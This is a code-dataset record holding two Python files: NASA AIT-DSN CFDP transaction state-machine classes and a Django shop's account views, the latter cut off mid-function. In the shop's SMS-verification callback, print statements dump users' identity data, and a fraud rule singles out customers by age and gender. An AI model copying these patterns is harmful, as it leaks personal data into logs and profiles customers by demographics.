    """
    os.system('cls' if os.name == 'nt' else 'clear')
| 360 | 0 | 76 |
22c5a1b7e06dc39bf91f470930269579fc50fe4b | 9,524 | py | Python | ait/dsn/cfdp/machines/machine.py | kmarwah/AIT-DSN | 338614dfef6713431f79d6daaffc0e4303be0ced | [
"MIT"
] | 12 | 2019-01-30T17:43:51.000Z | 2022-02-23T03:36:57.000Z | ait/dsn/cfdp/machines/machine.py | kmarwah/AIT-DSN | 338614dfef6713431f79d6daaffc0e4303be0ced | [
"MIT"
] | 117 | 2018-04-16T16:11:48.000Z | 2022-03-31T18:21:24.000Z | ait/dsn/cfdp/machines/machine.py | kmarwah/AIT-DSN | 338614dfef6713431f79d6daaffc0e4303be0ced | [
"MIT"
] | 12 | 2018-08-30T15:52:56.000Z | 2022-01-12T19:52:04.000Z | # Advanced Multi-Mission Operations System (AMMOS) Instrument Toolkit (AIT)
# Bespoke Link to Instruments and Small Satellites (BLISS)
#
# Copyright 2018, by the California Institute of Technology. ALL RIGHTS
# RESERVED. United States Government Sponsorship acknowledged. Any
# commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
#
# This software may be subject to U.S. export control laws. By accepting
# this software, the user agrees to comply with all applicable U.S. export
# laws and regulations. User has the responsibility to obtain export licenses,
# or other export authority as may be required before exporting such
# information to foreign countries or providing access to foreign persons.
from ait.dsn.cfdp.primitives import Role, MachineState, FinalStatus, IndicationType, HandlerCode, ConditionCode
from ait.dsn.cfdp.events import Event
import ait.core.log
class ID(object):
"""
CFDP entity ID. Unsigned binary integer
Entity ID length is 3 bits, value can be up to 8 octets (bytes) long
Entity ID is packed in PDUs by octet length less 1 (e.g. 0 for 1 octet length)
"""
# TODO figure out 3 bit length, 8 byte value restriction
@property
@length.setter
@property
@value.setter
| 36.212928 | 114 | 0.653507 | # Advanced Multi-Mission Operations System (AMMOS) Instrument Toolkit (AIT)
# Bespoke Link to Instruments and Small Satellites (BLISS)
#
# Copyright 2018, by the California Institute of Technology. ALL RIGHTS
# RESERVED. United States Government Sponsorship acknowledged. Any
# commercial use must be negotiated with the Office of Technology Transfer
# at the California Institute of Technology.
#
# This software may be subject to U.S. export control laws. By accepting
# this software, the user agrees to comply with all applicable U.S. export
# laws and regulations. User has the responsibility to obtain export licenses,
# or other export authority as may be required before exporting such
# information to foreign countries or providing access to foreign persons.
from ait.dsn.cfdp.primitives import Role, MachineState, FinalStatus, IndicationType, HandlerCode, ConditionCode
from ait.dsn.cfdp.events import Event
import ait.core.log
class ID(object):
    """
    CFDP entity ID. Unsigned binary integer
    Entity ID length is 3 bits, value can be up to 8 octets (bytes) long
    Entity ID is packed in PDUs by octet length less 1 (e.g. 0 for 1 octet length)
    """
    # TODO figure out 3 bit length, 8 byte value restriction
    def __init__(self, length, value):
        # Deliberately raw assignment: construction does not run the
        # property validation below.
        self._length = length
        self._value = value

    @property
    def length(self):
        """Octet length of the entity ID."""
        return self._length

    @length.setter
    def length(self, octets):
        if not octets:
            raise ValueError('length cannot be empty')
        if octets > 8:
            raise ValueError('id length cannot exceed 8 bytes')
        self._length = octets

    @property
    def value(self):
        """Unsigned integer value of the entity ID."""
        return self._value

    @value.setter
    def value(self, new_value):
        if not new_value:
            raise ValueError('value cannot be empty')
        self._value = new_value
class Transaction(object):
    """Per-transaction bookkeeping for a CFDP transfer.

    A transaction is uniquely identified by the pair
    (entity id, transaction sequence number).
    """
    def __init__(self, entity_id, transaction_id):
        # Identity: concatenation of entity id and transaction sequence number
        self.entity_id = entity_id
        self.transaction_id = transaction_id
        # Lifecycle flags
        self.abandoned = False
        self.cancelled = False
        self.finished = False
        self.frozen = False
        self.suspended = False
        # Outcome bookkeeping
        self.condition_code = None  # condition code under which Tx was finished
        self.delivery_code = None   # Data Complete or Data Incomplete
        self.final_status = None
        # File-data progress (last chunk sent or received)
        self.filedata_offset = None
        self.filedata_length = None
        self.filedata_checksum = 0
        # Metadata / peer information
        self.is_metadata_received = False
        self.metadata = None
        self.other_entity_id = None  # entity ID of other end of Tx
        self.start_time = None
        # Local file state
        self.full_file_path = None
        self.recv_file_size = 0
        self.file_checksum = None
class Machine(object):
    """Base class for CFDP transaction state machines.

    Holds the per-transaction bookkeeping (flags, timers, open files) that
    sender/receiver subclasses drive via ``update_state``.
    """
    role = Role.UNDEFINED
    # state descriptors for the machine. override with appropriate descriptions in subclasses
    S1 = MachineState.SEND_METADATA
    S2 = MachineState.SEND_FILEDATA

    def __init__(self, cfdp, transaction_id, *args, **kwargs):
        """Create a machine bound to the CFDP kernel and a transaction id.

        Accepts an optional ``indication_handler`` kwarg; defaults to the
        logging-only handler below.
        """
        self.kernel = cfdp
        self.transaction = Transaction(cfdp.mib.local_entity_id, transaction_id)
        self.state = self.S1
        # Set up fault and indication handlers
        self.indication_handler = kwargs.get('indication_handler', self._indication_handler)
        # Open file being sent or received (final file, not temp)
        self.file = None
        # Path of source or destination file (depending on role)
        self.file_path = None
        # Open temp file for receiving file data
        self.temp_file = None
        self.temp_path = None
        # header is re-used to make each PDU because values will mostly be the same
        self.header = None
        self.metadata = None
        self.eof = None
        # State machine flags
        self.pdu_received = False
        self.put_request_received = False
        self.eof_received = False
        self.eof_sent = False
        self.machine_finished = False
        self.initiated_cancel = False
        # Flags for PDUs that still need to be transmitted
        self.is_ack_outgoing = False
        self.is_oef_outgoing = False
        self.is_fin_outgoing = False
        self.is_md_outgoing = False
        self.is_nak_outgoing = False
        self.is_shutdown = False
        self.inactivity_timer = None
        self.ack_timer = None
        self.nak_timer = None

    def _indication_handler(self, indication_type, *args, **kwargs):
        """
        Default indication handler, which is just to log a message
        Indication type is primitive type `IndicationType`
        """
        ait.core.log.info('INDICATION: ' + str(indication_type))

    def fault_handler(self, condition_code, *args, **kwargs):
        """
        Default fault handler, which is just to log a message
        Fault type is primitive type `ConditionCode`

        Dispatches on the MIB-configured handler for the condition code:
        IGNORE returns True; CANCEL/ABANDON/SUSPEND drive the state machine.
        """
        ait.core.log.info('FAULT: ' + str(condition_code))
        handler = self.kernel.mib.fault_handler(condition_code)
        if handler == HandlerCode.IGNORE:
            return True
        elif handler == HandlerCode.CANCEL:
            self.initiated_cancel = True
            self.cancel()
            if self.role == Role.CLASS_1_SENDER:
                self.update_state(Event.NOTICE_OF_CANCELLATION)
            elif self.role == Role.CLASS_1_RECEIVER:
                self.finish_transaction()
        elif handler == HandlerCode.ABANDON:
            self.update_state(Event.ABANDON_TRANSACTION)
        elif handler == HandlerCode.SUSPEND:
            self.update_state(Event.NOTICE_OF_SUSPENSION)

    def update_state(self, event=None, pdu=None, request=None):
        """
        Evaluate a state change on received input
        :param event:
        :param pdu:
        :param request:
        :return:
        """
        raise NotImplementedError

    def abandon(self):
        """Abandon the transaction: mark final status and shut down."""
        self.transaction.abandoned = True
        self.transaction.finished = True
        self.transaction.final_status = FinalStatus.FINAL_STATUS_ABANDONED
        self.indication_handler(IndicationType.ABANDONED_INDICATION)
        self.shutdown()

    def suspend(self):
        """Pause all running timers and issue a Suspended indication (idempotent)."""
        if not self.transaction.suspended:
            self.transaction.suspended = True
            if self.inactivity_timer:
                self.inactivity_timer.pause()
            if self.ack_timer:
                self.ack_timer.pause()
            if self.nak_timer:
                self.nak_timer.pause()
            self.indication_handler(IndicationType.SUSPENDED_INDICATION,
                                    transaction_id=self.transaction.transaction_id,
                                    condition_code=ConditionCode.SUSPEND_REQUEST_RECEIVED)

    def cancel(self):
        """Cancel self"""
        # Drop all pending outgoing PDUs and stop the timers.
        self.is_oef_outgoing = False
        self.is_ack_outgoing = False
        self.is_fin_outgoing = False
        self.is_md_outgoing = False
        self.is_nak_outgoing = False
        self.transaction.cancelled = True
        if self.inactivity_timer:
            self.inactivity_timer.cancel()
        if self.ack_timer:
            self.ack_timer.cancel()
        if self.nak_timer:
            self.nak_timer.cancel()

    def notify_partner_of_cancel(self):
        """Ask partner to cancel and then shutdown"""
        # Queue an EOF (cancel) PDU for the partner before shutting down.
        self.is_oef_outgoing = True
        self.transaction.cancelled = True
        self.indication_handler(IndicationType.TRANSACTION_FINISHED_INDICATION,
                                transaction_id=self.transaction.transaction_id)
        # Shutdown
        self.shutdown()

    def finish_transaction(self):
        """Closes out a transaction. Sends the appropriate Indication and resets instance variables"""
        ait.core.log.info("Machine {} finishing transaction...".format(self.transaction.transaction_id))
        self.is_oef_outgoing = False
        self.is_ack_outgoing = False
        self.is_fin_outgoing = False
        self.is_md_outgoing = False
        self.is_nak_outgoing = False
        if self.inactivity_timer:
            self.inactivity_timer.cancel()
        if self.ack_timer:
            self.ack_timer.cancel()
        if self.nak_timer:
            self.nak_timer.cancel()
        self.transaction.finished = True
        # Determine the final status: a Class-1 receiver that never saw
        # metadata is a distinct failure mode from an explicit cancel.
        if self.role == Role.CLASS_1_RECEIVER and not self.transaction.is_metadata_received:
            self.transaction.final_status = FinalStatus.FINAL_STATUS_NO_METADATA
        elif self.transaction.cancelled:
            self.transaction.final_status = FinalStatus.FINAL_STATUS_CANCELLED
        else:
            self.transaction.final_status = FinalStatus.FINAL_STATUS_SUCCESSFUL
        self.indication_handler(IndicationType.TRANSACTION_FINISHED_INDICATION,
                                transaction_id=self.transaction.transaction_id)

    def shutdown(self):
        """Release open file handles and mark the machine as shut down."""
        ait.core.log.info("Machine {} shutting down...".format(self.transaction.transaction_id))
        if self.file is not None and not self.file.closed:
            self.file.close()
            self.file = None
        if self.temp_file is not None and not self.temp_file.closed:
            self.temp_file.close()
            self.temp_file = None
            # If transaction was unsuccesful, delete temp file
        # TODO issue Tx indication (finished, abandoned, etc)
        # BUG FIX: was `self.transaction.finish = True`, which only created a
        # stray attribute; the flag read elsewhere is `finished`.
        self.transaction.finished = True
        self.is_shutdown = True
| 4,168 | 3,843 | 203 |
167538b2fcb361c4fd74d8a7824450a235f4128c | 27,895 | py | Python | member/views.py | pincoin/rakmai | d9daa399aff50712a86b2dec9d94e622237b25b0 | [
"MIT"
] | 11 | 2018-04-02T16:36:19.000Z | 2019-07-10T05:54:58.000Z | member/views.py | pincoin/rakmai | d9daa399aff50712a86b2dec9d94e622237b25b0 | [
"MIT"
] | 22 | 2019-01-01T20:40:21.000Z | 2022-02-10T08:06:39.000Z | member/views.py | pincoin/rakmai | d9daa399aff50712a86b2dec9d94e622237b25b0 | [
"MIT"
] | 4 | 2019-03-12T14:24:37.000Z | 2022-01-07T16:20:22.000Z | import json
import logging
import re
import uuid
from datetime import datetime
import requests
from allauth.account.models import EmailAddress
from allauth.account.views import (
LoginView, LogoutView, SignupView,
PasswordChangeView, PasswordSetView,
PasswordResetView, PasswordResetDoneView, PasswordResetFromKeyView, PasswordResetFromKeyDoneView,
EmailVerificationSentView, ConfirmEmailView, EmailView, AccountInactiveView
)
from allauth.socialaccount import views as socialaccount_views
from allauth.socialaccount.models import SocialAccount
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth import logout
from django.contrib.auth.mixins import (
AccessMixin, LoginRequiredMixin
)
from django.contrib.gis.geoip2 import GeoIP2
from django.shortcuts import (
get_object_or_404
)
from django.urls import reverse
from django.utils.timezone import (
timedelta, localtime, make_aware, now
)
from django.utils.translation import ugettext_lazy as _
from django.views.generic import (
TemplateView, UpdateView, DetailView, FormView
)
from geoip2.errors import AddressNotFoundError
from ipware import get_client_ip
from rest_framework import (
status, views
)
from rest_framework.response import Response
from rakmai.viewmixins import HostContextMixin
from shop.models import Order
from shop.tasks import (
send_notification_line
)
from shop.viewmixins import StoreContextMixin
from . import settings as member_settings
from .forms2 import (
MemberLoginForm, MemberResetPasswordForm, MemberResetPasswordKeyForm, MemberAddEmailForm,
MemberChangePasswordForm, MemberSetPasswordForm,
MemberDocumentForm, MemberUnregisterForm, MemberChangeNameForm,
)
from .models import (
Profile, PhoneVerificationLog, PhoneBanned
)
from .serializers import IamportSmsCallbackSerializer
| 42.915385 | 120 | 0.59197 | import json
import logging
import re
import uuid
from datetime import datetime
import requests
from allauth.account.models import EmailAddress
from allauth.account.views import (
LoginView, LogoutView, SignupView,
PasswordChangeView, PasswordSetView,
PasswordResetView, PasswordResetDoneView, PasswordResetFromKeyView, PasswordResetFromKeyDoneView,
EmailVerificationSentView, ConfirmEmailView, EmailView, AccountInactiveView
)
from allauth.socialaccount import views as socialaccount_views
from allauth.socialaccount.models import SocialAccount
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth import logout
from django.contrib.auth.mixins import (
AccessMixin, LoginRequiredMixin
)
from django.contrib.gis.geoip2 import GeoIP2
from django.shortcuts import (
get_object_or_404
)
from django.urls import reverse
from django.utils.timezone import (
timedelta, localtime, make_aware, now
)
from django.utils.translation import ugettext_lazy as _
from django.views.generic import (
TemplateView, UpdateView, DetailView, FormView
)
from geoip2.errors import AddressNotFoundError
from ipware import get_client_ip
from rest_framework import (
status, views
)
from rest_framework.response import Response
from rakmai.viewmixins import HostContextMixin
from shop.models import Order
from shop.tasks import (
send_notification_line
)
from shop.viewmixins import StoreContextMixin
from . import settings as member_settings
from .forms2 import (
MemberLoginForm, MemberResetPasswordForm, MemberResetPasswordKeyForm, MemberAddEmailForm,
MemberChangePasswordForm, MemberSetPasswordForm,
MemberDocumentForm, MemberUnregisterForm, MemberChangeNameForm,
)
from .models import (
Profile, PhoneVerificationLog, PhoneBanned
)
from .serializers import IamportSmsCallbackSerializer
class MemberLoginView(HostContextMixin, StoreContextMixin, LoginView):
    """Store-aware login view.

    Requires a Google reCAPTCHA on the login form after any failed attempt
    (tracked via a session key) or when the client IP geolocates outside
    the whitelisted countries.
    """
    template_name = 'member/account/login.html'
    form_class = MemberLoginForm

    def get_form_kwargs(self):
        """Decide whether the form must render/validate a reCAPTCHA."""
        # Pass 'self.request' object to PostForm instance
        kwargs = super(MemberLoginView, self).get_form_kwargs()
        kwargs['recaptcha'] = False
        # A previous failed attempt in this session forces the captcha on.
        if member_settings.GOOGLE_RECAPTCHA_SESSION_KEY in self.request.session:
            kwargs['recaptcha'] = True
        try:
            ip_address = get_client_ip(self.request)[0]
            if ip_address not in ['127.0.0.1']:
                country = GeoIP2().country(ip_address)
                # Clients outside the whitelisted countries must pass the captcha.
                if country['country_code'] and country['country_code'].upper() not in settings.WHITE_COUNTRY_CODES:
                    kwargs['recaptcha'] = True
        except AddressNotFoundError:
            # IP missing from the GeoIP database: treat as non-suspicious.
            pass
        return kwargs

    def form_valid(self, form):
        """On success, clear the session flag so the next login needs no captcha."""
        if member_settings.GOOGLE_RECAPTCHA_SESSION_KEY in self.request.session:
            del self.request.session[member_settings.GOOGLE_RECAPTCHA_SESSION_KEY]
        return super(MemberLoginView, self).form_valid(form)

    def form_invalid(self, form):
        """On failure, flag the session so subsequent attempts require a captcha."""
        self.request.session[member_settings.GOOGLE_RECAPTCHA_SESSION_KEY] = True
        self.request.session.modified = True
        return super(MemberLoginView, self).form_invalid(form)

    def get_context_data(self, **kwargs):
        """Expose the page title and the reCAPTCHA site key to the template."""
        context = super(MemberLoginView, self).get_context_data(**kwargs)
        context['page_title'] = _('Login')
        context['google_recaptcha_site_key'] = settings.GOOGLE_RECAPTCHA['site_key']
        return context
class MemberLogoutView(HostContextMixin, StoreContextMixin, LogoutView):
    """allauth logout view rendered inside the store layout."""
    template_name = 'member/account/logout.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberLogoutView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Logout'))
        return ctx
class MemberSignupView(HostContextMixin, StoreContextMixin, SignupView):
    """allauth signup view rendered inside the store layout."""
    template_name = 'member/account/signup.html'
    template_name_signup_closed = 'member/account/signup_closed.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberSignupView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Sign up'))
        return ctx
class MemberPasswordReset(HostContextMixin, StoreContextMixin, PasswordResetView):
    """allauth password-reset request view rendered inside the store layout."""
    template_name = 'member/account/password_reset.html'
    form_class = MemberResetPasswordForm

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberPasswordReset, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Password Reset'))
        return ctx
class MemberPasswordResetDoneView(HostContextMixin, StoreContextMixin, PasswordResetDoneView):
    """Confirmation page shown after a password-reset email was sent."""
    template_name = 'member/account/password_reset_done.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberPasswordResetDoneView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Password Reset Done'))
        return ctx
class MemberPasswordResetFromKeyView(HostContextMixin, StoreContextMixin, PasswordResetFromKeyView):
    """Password-reset form reached from the emailed key link."""
    template_name = 'member/account/password_reset_from_key.html'
    form_class = MemberResetPasswordKeyForm

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberPasswordResetFromKeyView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Password Reset'))
        return ctx
class MemberPasswordResetFromKeyDoneView(HostContextMixin, StoreContextMixin, PasswordResetFromKeyDoneView):
    """Confirmation page shown after a key-based password reset completed."""
    template_name = 'member/account/password_reset_from_key_done.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberPasswordResetFromKeyDoneView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Password Reset Done'))
        return ctx
class MemberEmailVerificationSentView(HostContextMixin, StoreContextMixin, EmailVerificationSentView):
    """Page confirming that a verification email was dispatched."""
    template_name = 'member/account/verification_sent.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberEmailVerificationSentView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Email Verification Sent'))
        return ctx
class MemberConfirmEmailView(HostContextMixin, StoreContextMixin, ConfirmEmailView):
    """allauth email-confirmation view rendered inside the store layout."""
    template_name = 'member/account/email_confirm.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberConfirmEmailView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Confirm Email Request'))
        return ctx
class MemberEmailView(HostContextMixin, StoreContextMixin, LoginRequiredMixin, EmailView):
    """Email address management page (login required)."""
    template_name = 'member/account/email.html'
    form_class = MemberAddEmailForm

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberEmailView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Email Management'))
        return ctx
class MemberAccountInactiveView(HostContextMixin, StoreContextMixin, AccountInactiveView):
    """Page shown when the account has been deactivated."""
    template_name = 'member/account/account_inactive.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberAccountInactiveView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Account Inactive'))
        return ctx
class MemberPasswordChangeView(HostContextMixin, StoreContextMixin, LoginRequiredMixin, PasswordChangeView):
    """Password change form for an authenticated member."""
    template_name = 'member/account/password_change.html'
    form_class = MemberChangePasswordForm

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberPasswordChangeView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Password Change'))
        return ctx
class MemberPasswordSetView(HostContextMixin, StoreContextMixin, LoginRequiredMixin, PasswordSetView):
    """Initial password set form (for social-login accounts without one)."""
    template_name = 'member/account/password_set.html'
    form_class = MemberSetPasswordForm

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberPasswordSetView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Password Set'))
        return ctx
class MemberSocialLoginCancelledView(HostContextMixin, StoreContextMixin, socialaccount_views.LoginCancelledView):
    """Page shown when the user cancels a social (SNS) login flow."""
    template_name = 'member/socialaccount/login_cancelled.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberSocialLoginCancelledView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Login Cancelled'))
        return ctx
class MemberSocialLoginErrorView(HostContextMixin, StoreContextMixin, socialaccount_views.LoginErrorView):
    """Error page for a failed social (SNS) authentication."""
    template_name = 'member/socialaccount/authentication_error.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberSocialLoginErrorView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Social Network Login Failure'))
        return ctx
class MemberSocialSignupView(HostContextMixin, StoreContextMixin, socialaccount_views.SignupView):
    """Signup completion page for accounts created via a social provider."""
    template_name = 'member/socialaccount/signup.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberSocialSignupView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Sign up'))
        return ctx
class MemberSocialConnectionsView(HostContextMixin, StoreContextMixin, LoginRequiredMixin,
                                  socialaccount_views.ConnectionsView):
    """Management page for the member's linked social (SNS) accounts."""
    template_name = 'member/socialaccount/connections.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(MemberSocialConnectionsView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Connect with SNS accounts'))
        return ctx
class TermsView(HostContextMixin, StoreContextMixin, TemplateView):
    """Static terms-and-conditions page."""
    template_name = 'member/account/terms.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(TermsView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Terms and Conditions'))
        return ctx
class PrivacyView(HostContextMixin, StoreContextMixin, TemplateView):
    """Static privacy-policy page."""
    template_name = 'member/account/privacy.html'

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        ctx = super(PrivacyView, self).get_context_data(**kwargs)
        ctx.update(page_title=_('Privacy Policy'))
        return ctx
class MemberProfileView(LoginRequiredMixin, HostContextMixin, StoreContextMixin, DetailView):
    """Profile page for the logged-in member, including Iamport SMS-verification hooks."""
    template_name = 'member/account/profile.html'
    context_object_name = 'member'

    def get_object(self, queryset=None):
        """Return the Profile of the current user (ignores URL pk/slug)."""
        # NOTE: This method is overridden because DetailView must be called with either an object pk or a slug.
        queryset = Profile.objects \
            .select_related('user')
        return get_object_or_404(queryset, user__pk=self.request.user.id)

    def get_context_data(self, **kwargs):
        """Expose page title, Hangul-name flag and Iamport settings to the template."""
        context = super(MemberProfileView, self).get_context_data(**kwargs)
        context['page_title'] = _('Profile')
        pattern = re.compile(r'^[가-힣]+$')  # Only Hangul
        # True only when both last and first name consist entirely of Hangul.
        context['hangul_name'] = True \
            if pattern.match(self.request.user.last_name) and pattern.match(self.request.user.first_name) else False
        context['iamport_user_code'] = settings.IAMPORT['user_code']
        # Absolute URL to which Iamport posts the SMS verification result.
        context['iamport_sms_callback_url'] = self.request.build_absolute_uri(
            reverse(settings.IAMPORT['sms_callback_url']))
        return context
class MemberConfirmDocumentView(LoginRequiredMixin, HostContextMixin, StoreContextMixin, UpdateView):
    """Upload form for identity-document verification.

    On a valid submission the profile is saved and customer service is
    notified via a LINE message (email notification is currently disabled).
    """
    template_name = 'member/account/document_confirm.html'
    model = Profile
    form_class = MemberDocumentForm

    def get_object(self, queryset=None):
        """Return the Profile of the current user (ignores URL pk/slug)."""
        # NOTE: This method is overridden because DetailView must be called with either an object pk or a slug.
        queryset = Profile.objects \
            .select_related('user')
        return get_object_or_404(queryset, user__pk=self.request.user.id)

    def form_valid(self, form):
        """Save the document, then notify staff over LINE with a review link."""
        response = super(MemberConfirmDocumentView, self).form_valid(form)
        # The triple-quoted block below is disabled email-notification code,
        # kept verbatim; LINE notification below replaced it.
        '''
        orders = Order.objects.valid(self.request.user).filter(status__in=[
            Order.STATUS_CHOICES.payment_completed,
            Order.STATUS_CHOICES.under_review,
            Order.STATUS_CHOICES.payment_verified
        ])
        if orders:
            html_message = render_to_string('member/account/email/document_verified.html',
                                            {'profile': self.object, 'orders': orders})
            send_notification_email.delay(
                _('[site] Customer Document Verification'),
                'dummy',
                settings.EMAIL_NO_REPLY,
                [settings.EMAIL_CUSTOMER_SERVICE],
                html_message,
            )
        '''
        message = _('Document Verification {} {} {}') \
            .format(self.object.full_name,
                    self.object.email,
                    self.request.build_absolute_uri(reverse('rabop:customer-detail', args=('default', self.object.id))))
        send_notification_line.delay(message)
        return response

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        context = super(MemberConfirmDocumentView, self).get_context_data(**kwargs)
        context['page_title'] = _('Document Verification')
        return context

    def get_success_url(self):
        """Redirect back to the profile page after a successful upload."""
        return reverse('account_profile')
class MemberUnregisterView(AccessMixin, HostContextMixin, StoreContextMixin, FormView):
    """Account deletion (soft): anonymizes and deactivates the user record.

    Email/username get a UUID suffix so they can be re-registered later;
    the row itself is kept for audit/order history.
    """
    template_name = 'member/account/unregister.html'
    form_class = MemberUnregisterForm

    def dispatch(self, request, *args, **kwargs):
        """Enforce login manually, then load the current user."""
        # LoginRequiredMixin is not used because of inheritance order
        if not request.user.is_authenticated:
            return self.handle_no_permission()
        self.member = get_user_model().objects.get(pk=self.request.user.id)
        return super(MemberUnregisterView, self).dispatch(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        """Add page title and the member being unregistered."""
        context = super(MemberUnregisterView, self).get_context_data(**kwargs)
        context['page_title'] = _('Unregister')
        context['member'] = self.member
        return context

    def form_valid(self, form):
        """Anonymize, deactivate, strip privileges, purge auth records, log out."""
        response = super(MemberUnregisterView, self).form_valid(form)
        # UUID suffix frees the email/username for future re-registration.
        self.member.email = self.member.email + '_' + str(uuid.uuid4())
        self.member.username = self.member.username + '_' + str(uuid.uuid4())
        # NOTE(review): blanking the password works but set_unusable_password()
        # would be the conventional Django approach — confirm before changing.
        self.member.password = ''
        self.member.is_active = False
        self.member.is_staff = False
        self.member.is_superuser = False
        self.member.save()
        # Remove allauth email addresses and linked social accounts.
        EmailAddress.objects.filter(user__id=self.member.id).delete()
        SocialAccount.objects.filter(user__id=self.member.id).delete()
        logout(self.request)
        return response

    def get_success_url(self):
        """Send the (now logged-out) visitor back to the store home page."""
        return reverse('shop:home', args=(self.store.code,))
class MemberNameUpdateView(LoginRequiredMixin, HostContextMixin, StoreContextMixin, UpdateView):
    """Change the member's legal name.

    Because identity checks are bound to the name, saving a new name resets
    both phone and document verification back to unverified.
    """
    template_name = 'member/account/name_change.html'
    model = Profile
    form_class = MemberChangeNameForm

    def get_object(self, queryset=None):
        """Return the Profile of the current user (ignores URL pk/slug)."""
        # NOTE: This method is overridden because DetailView must be called with either an object pk or a slug.
        queryset = Profile.objects \
            .select_related('user')
        return get_object_or_404(queryset, user__pk=self.request.user.id)

    def get_context_data(self, **kwargs):
        """Add the page title used by the shared template."""
        context = super(MemberNameUpdateView, self).get_context_data(**kwargs)
        context['page_title'] = _('Change Your Name')
        return context

    def form_valid(self, form):
        """Persist the trimmed name on the User, then invalidate verifications."""
        form.instance.user.first_name = form.cleaned_data['first_name'].strip()
        form.instance.user.last_name = form.cleaned_data['last_name'].strip()
        form.instance.user.save()
        # Name changed: previous identity verifications no longer apply.
        form.instance.phone_verified_status = Profile.PHONE_VERIFIED_STATUS_CHOICES.unverified
        form.instance.document_verified = False
        return super(MemberNameUpdateView, self).form_valid(form)

    def get_success_url(self):
        """Redirect back to the profile page after a successful change."""
        return reverse('account_profile')
class IamportSmsCallbackView(StoreContextMixin, HostContextMixin, views.APIView):
logger = logging.getLogger(__name__)
sub_domain = 'card'
    def get_access_token(self):
        """Fetch an Iamport REST API access token.

        Returns the token string on success (HTTP 200 and API code 0),
        otherwise None.
        """
        # NOTE(review): this URL inserts a '/' before the path while find()
        # below does not — presumably IAMPORT['api_url'] ends with '/';
        # verify the settings value to avoid a double slash here.
        response = requests.post(
            '{}/users/getToken'.format(settings.IAMPORT['api_url']),
            data=json.dumps({
                'imp_key': settings.IAMPORT['api_key'],
                'imp_secret': settings.IAMPORT['secret'],
            }),
            headers={
                'Content-Type': 'application/json',
                'Cache-Control': 'no-cache',
            })
        if response.status_code == requests.codes.ok:
            result = response.json()
            # Iamport wraps payloads: code 0 means success.
            if result['code'] == 0:
                return result['response']['access_token']
        return None
    def find(self, imp_uid, token=None):
        """Look up an Iamport SMS certification result by its imp_uid.

        Fetches an access token when one is not supplied. Returns the
        certification payload dict on success, otherwise None.
        """
        if not token:
            token = self.get_access_token()
        response = requests.get(
            '{}certifications/{}'.format(settings.IAMPORT['api_url'], imp_uid),
            headers={
                "Authorization": token
            })
        if response.status_code == requests.codes.ok:
            result = response.json()
            # Iamport wraps payloads: code 0 means success.
            if result['code'] == 0:
                return result['response']
        return None
    def get(self, request, format=None):
        """GET is a no-op for this callback endpoint; respond with an empty body."""
        return Response(None)
def post(self, request, format=None):
serializer = IamportSmsCallbackSerializer(data=request.data)
if serializer.is_valid():
response = self.find(request.data['imp_uid'])
if response and response['certified']:
print(request.data)
print(response)
try:
profile = Profile.objects.select_related('user').get(user__pk=int(request.data['merchant_uid']))
log = PhoneVerificationLog()
log.owner = profile.user
log.transaction_id = response['pg_tid']
log.di = response['unique_in_site']
log.ci = response['unique_key']
log.fullname = response['name']
log.date_of_birth = datetime.fromtimestamp(int(response['birth'])).strftime('%Y%m%d')
log.gender = 1 if response['gender'] == 'male' else 0
log.domestic = 1 if not response['foreigner'] else 0
log.telecom = response['carrier']
log.cellphone = response['phone']
log.save()
# check duplicate user verifications
logs = PhoneVerificationLog.objects \
.filter(ci=log.ci,
owner__isnull=False,
created__gte=make_aware(localtime().now() - timedelta(hours=48))) \
.exclude(owner=log.owner)
banned = PhoneBanned.objects.filter(phone=log.cellphone).exists()
if not logs:
# 1. 50세 이상 여자 90일
if now().date() - datetime.strptime(log.date_of_birth, '%Y%m%d').date() \
> timedelta(days=365 * 50) \
and log.gender == 0 \
and now() - profile.user.date_joined < timedelta(days=90):
